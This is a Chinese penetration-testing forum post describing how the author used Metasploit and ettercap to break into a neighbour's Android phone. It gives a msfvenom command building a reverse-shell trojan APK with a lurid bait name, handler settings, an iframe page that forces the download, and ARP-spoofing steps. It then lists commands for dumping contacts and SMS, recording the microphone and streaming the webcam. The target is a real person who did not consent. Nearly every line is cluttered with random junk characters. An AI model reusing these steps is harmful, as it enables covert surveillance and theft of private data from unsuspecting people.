中国网络渗透测试联盟

标题: metasploit+ettercap中间人攻击成功入侵邻居手机 [打印本页]
作者: admin    时间: 2018-10-20 20:30
标题: metasploit+ettercap中间人攻击成功入侵邻居手机

, |( I2 u, [$ }/ e# }3 v6 H5 h 五、msf+ettercap入侵邻居安卓手机 7 g, f1 I* J3 x# R

) b9 ]. J5 {, g+ Z8 D: ?- m/ j

l# g2 U( J" X2 G: x 首先启动msf , h# U+ q1 U3 c7 R" R! I

. X% r% n0 r- }# U# \9 a6 Q) S

2 H3 c0 y4 Y8 J 先用kali生成一个安卓木马,如下命令: 0 ~' g1 v1 a7 h! R! q# t8 ?0 l9 R

7 H8 D; |8 M! `- I3 q

( H1 x) l9 X U Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 7 A( w+ [5 z, D- N+ S# P

3 z9 v! ~7 T) S

7 t, t0 F8 B( E* b2 N; c* |- s 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 8 j: \/ Y6 D2 E7 D$ ^/ ~( O

% Y* R3 b0 A* v. E3 W. U! f7 u

/ p7 r2 @2 ?* N, E; e7 q$ L 然后进入msf 4 S) P6 P: ]3 p3 H6 C

6 [* \2 f0 Q9 [ e, M m

0 g( `! ~# Q% v( @ use exploit/multi/handler / b8 w! J7 P4 `! [

( K q7 t( [: _7 _: }# S* P) y' u0 Z

% q, l' \3 |- c$ C( K9 q' A! s set payload android/meterpreter/reverse_tcp & H9 v6 Y# h; o7 w+ |' k

5 Z$ v1 Z/ V# W

, P! z6 c! v5 d5 G set LHOST 192.168.0.109 //ipkailiip ( E+ B$ [( A1 t! V- E

" e: L6 d' I2 y/ c/ m0 {2 n

& q' A( P5 s: P5 Y8 K set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ' M {5 c) K7 i" @3 I0 g6 `

c) W a* S# i1 G5 y* [

# J# X: m% _+ q$ G( Z0 j# \1 U2 J Exploit % W8 x8 q' X8 w' y( ?; x

" H' y: H; p6 r7 E

- x* z+ G8 A1 a% r8 x   3 C4 F- i+ h2 a

- C4 y: _5 i$ u

' g+ |7 _( w3 E8 r4 X# t0 I6 W: z, @ 下面我们开启ettercap -G 5 G, B G, q% ~

/ w8 r( t g9 K3 j: h/ ~3 n

7 i* l4 C/ W7 k$ w& r- v 我物理IP 8 a, p W6 N+ a( `

8 h% |/ R o* r. N9 x& a

7 Y: V# E: j& ]6 K! q   ) {/ P# u% |# ~( e: L5 f

# l A5 B+ n: L2 z1 ?" o3 _5 b8 F

0 r$ Z0 m6 ]" k. i E 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, / a3 a- ]# q( z- Y, Y: `( {$ \

. N: O* _. T- T0 ?

% D9 W/ a' P9 ]" H t* J 下面我们来设置一下 ) T r4 u4 t9 V4 U

' r1 N9 G8 l; @! v$ q! n. ^

+ [1 m$ o6 N6 n2 V* P0 Z" s   ' T) w/ L7 K- P. T; @/ O

' r. m. X& b6 R: ?/ ]$ O$ X

9 y1 z# P) X' l 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 3 v3 G, U7 K3 }% v7 _) q" p

4 O# X1 S I3 t; {' o# K+ _/ ~1 R( ?

# ^7 p* P, X; V9 q& o   $ Y* ]8 [5 U8 Y& H( v

+ f* i- `& N2 k+ U6 V9 M

( x+ B- a. G, J' Z6 d6 Q7 i2 `   ' f/ u6 b) Z& l3 F

8 C2 Z0 b7 `# E" v

; C0 Z5 K# a3 x   5 k3 V }5 |& n2 z

, d4 c& f7 ^/ t/ r8 g! |

[9 J5 B+ Z7 w5 t; }- Q6 \- d6 S   4 G! D7 y9 E( q( A) x/ N \

2 P. x/ }/ q. u' `; V

) }& R1 P. {! [   ' p5 @; q6 Z9 w! c% B) O

* E% R: ? `0 f p

; ?: r' }5 {* q   2 E2 i6 X/ K3 i4 M3 ^% z1 r6 T

/ _9 t% ], O% O1 P! D; X: ?2 c

% d7 j- U9 Y3 ]+ b3 V1 W- F: T, S   4 S. z, o" j" u/ K H

9 k9 t: @5 A! {% T

- m0 D8 [! X, j4 W- N0 Q   z0 Q+ @- Q: G* H. f6 k

5 ^3 B6 u* k( N* J) F

, z4 r0 Y2 W% o/ s   8 g4 o4 C, U/ J

7 T7 c3 H# b2 }* h j" S

- L8 l2 V6 ^1 J# e$ Y   M& e2 f* c% |. d1 y* ?5 a6 T

! U0 a' V0 G+ Q, J3 M

. C3 Q. S( a4 W6 j& a5 ^   " E; `' w5 I6 C8 a

* J ^. K+ l, W) V

" ^/ ^( S0 d0 r* j- Q; Z2 n   2 H; ?1 |, E8 Y4 c' O4 l

" k" j: g- I) `1 ]' Y- H

! I& e4 d. H$ C/ ]   ; _( x& z v, L) c u9 A! k: V

" M9 U9 v6 {4 i7 h' n

+ |% B. O, C6 ` 下面我们开始攻击 " {% A$ `1 J9 k; W

" o4 d0 Z: Q! X. z

5 h2 G2 z" N' Y& l   ; O# O. r$ n5 k8 x

/ L! ~7 z I* x1 ?. K

" H+ t5 t0 Q% Q   2 ^( M" y, @+ o* [8 W# u

( j, v; g( X' ]# H$ [

3 a$ d: ~# R" H2 S   # u& R+ s) ]7 ^! ^

; @& [7 e/ _5 B" ?9 k! R

: n; L) @; O% t   - o9 `2 Y' v1 _1 K) W$ q

% S/ Y% E* v( _

' Z" @1 R6 P' X" c, Q   ' D: F e4 X9 O/ [, u4 D" z' D! `; v% _

) C! Y/ q3 [/ A6 P1 E9 Z( L

" _' M0 F3 Y! p# F2 n% ` g" e1 @3 K 大概过了5分钟多,发现反弹成功了 " o/ F/ o3 V( ]0 |& ?7 q! ~' k

0 I3 I+ {# c( D5 K

( a2 R; ~9 G |* L7 `   / P, Z$ s7 p$ L' z

: ^0 e; d/ b% Q, V

+ Q% n: k: M4 ], [   : s7 B, G- u8 F# v! D) B

+ N9 A3 K e9 P0 w1 P7 I/ ]

- ]" d' V* }4 O8 c5 w; q/ d   * M& E6 }" V, ?- ?6 V

- j8 ^7 Q- F l# I9 z* E

5 _5 A0 m% E7 e5 H/ F: b   , n* U1 @: K" _

' C! i( [- v1 H" q% X9 l# ?

+ |: Q# O: Y2 D ?3 W2 C   ( _! i+ x3 v: K; r

; l2 K3 T6 C" C" ^8 W0 I) e3 U4 B

# S4 s, f) F1 v5 q0 k- u   ( i. z! i+ P3 u: R& @- f0 n$ v

6 N2 f4 R6 I0 y' b0 Z% y6 y

8 {: h0 x7 M* ~4 u' ~# N: y! J   ; \ g/ [' Y9 w, v9 r

7 ?! P9 L2 Z s1 _

5 Z- n7 k5 Y6 a8 K 执行命令 $ W' |( b8 g& F5 ~

3 B" w6 P, z$ F; B

7 Y& w8 j% [# r/ d( ~   0 ^; ]$ g4 \' }" e: L, R

% H" j' ~- G y* Z2 X

) A7 t& R# s6 p8 K5 n. f h dump_contacts    --》这个是导出电话 6 T9 n# u: K8 I

: M; G0 c' O3 \0 E$ X

8 ?3 Y0 t3 n# f% k( I dump_sms --》这个是导出信息 ; }: w6 @1 v2 I6 r; n1 c# s3 {4 W5 P

! Q z- A/ u9 A9 y9 M: R

/ c/ k+ _& O$ ] record_mic     Record audio from the default microphone for X seconds 8 S6 u! a( F/ v! s) [9 f; p

" ~- u! C. f. h$ d% N* n- a

; t& A" B! i% T% o7 \4 \     webcam_chat    Start a video chat 6 m5 L. K2 u+ {

% X% T/ e; F9 V) u" x2 C% l" V

( {* B0 h m7 m0 C3 u7 y     webcam_list    List webcams ( Z+ d) U9 O9 W9 x X

$ ]0 O: E. t0 U( _ u" j8 ?7 Q

* U" e3 }1 _: s, Z4 ^; I; H6 F     webcam_snap    Take a snapshot from the specified webcam C; J! m6 p" I* ?

; A. ]+ C$ R; m0 `, K% K: R9 r7 ?* o

9 T; f& b+ f, f3 D% |6 U& ~9 F# U webcam_stream  lay a video stream from the specified webcam , I' ~* e5 C0 a e, ]

8 V, a- i, U2 ?

& s* I8 V9 N. B* R9 I0 d6 ^   5 \1 J+ ?% _6 H" O6 Y2 R

! m8 a4 ^4 O9 r3 g- u# k5 F

2 A4 s# E1 ?5 i r" N0 _   & h, Y; v5 H1 x0 E5 r ^4 \

$ G7 z7 [2 L" G' _! f

, f3 ^+ J% o4 k 我们打开看一下电话薄, # J( G, v6 S( x

& ~( y& ~/ t+ w# g4 o X

Q( ?! K. H' W# k+ E& U' y4 |6 q   8 p- e4 [$ d# |' H* v& n% z' I

) p7 O* s& w# S6 M' u

- m3 @# m! X1 C8 f0 F- g   % c5 h3 @* I, R1 k: j7 f- k& B

2 ?. h. r# Q, ]

$ U7 G1 z3 A( r7 I1 H   * R p) |7 _9 Z( Q, I1 H! T- h

' K' z8 a2 A* Z5 A. ]* f: {) o

4 a( z( Z5 Z# V/ ?6 I   & F$ G2 D# w% i7 R0 L# H* T

' \' _1 G; B+ e0 }+ Q

) t0 @$ d6 i% w2 l% `6 _! g4 K, s   " P8 M5 G6 P' @5 j$ ~; E

; X& x' o& c" P# t" R

9 C" B8 V) c5 q4 v6 \   ( M& q! [4 }+ L+ b) O+ u) i

7 @9 [9 U& `5 y, L0 T* B

# m) H1 P, _9 b/ h* r1 O6 q7 M 我们同时欺骗成DroidJack木马,使用方法如图: ' c9 b2 H( w' x+ s1 l

1 e2 b$ O0 N7 E! [

1 G% g) u) U3 h" @' {* S   # b# U' K' c* ^0 M1 R( i

( n2 F3 Q$ w0 V5 W0 Y

( S: g6 `5 f. B {# A- N   ' d+ a# x. P6 O# N# L* g

0 r# p/ m8 D4 x. T: W# p b5 a

# q! n8 Q& A* Z   , y7 }+ m, p" G# c7 u$ U1 u

4 J5 f& [5 ]$ W9 ]

, |, q- B( i) ]; y: @6 b% C& L 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 + F( X& j) L/ w, y

E) n( `& f7 p& T( E

) ~! j! }. Z( o9 Y( t, S5 S   " Z( @8 }% i! ^3 U6 t( |

% e4 e& x2 ~5 c4 ?, C2 i

% n' h2 m! i) L2 u: m% p   3 p- ]8 B; z5 |+ [% I

$ F- t* p/ M, ^. d0 ]: r* z- k

( K7 L2 r: K( |   ( v) c; b6 s: O& r" e, ]& `

q4 P c6 ]% h( E

F2 L/ n. ~$ \6 T; A) t4 n1 U % z* s, b$ w/ c& y; v5 a. `; h& S

; ~2 D: q* N" m3 w" P! ~2 ]* J

]' w" I2 r1 `5 N3 B) l/ D
V- N) q' u. p, T& O2 x( _. x, H





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2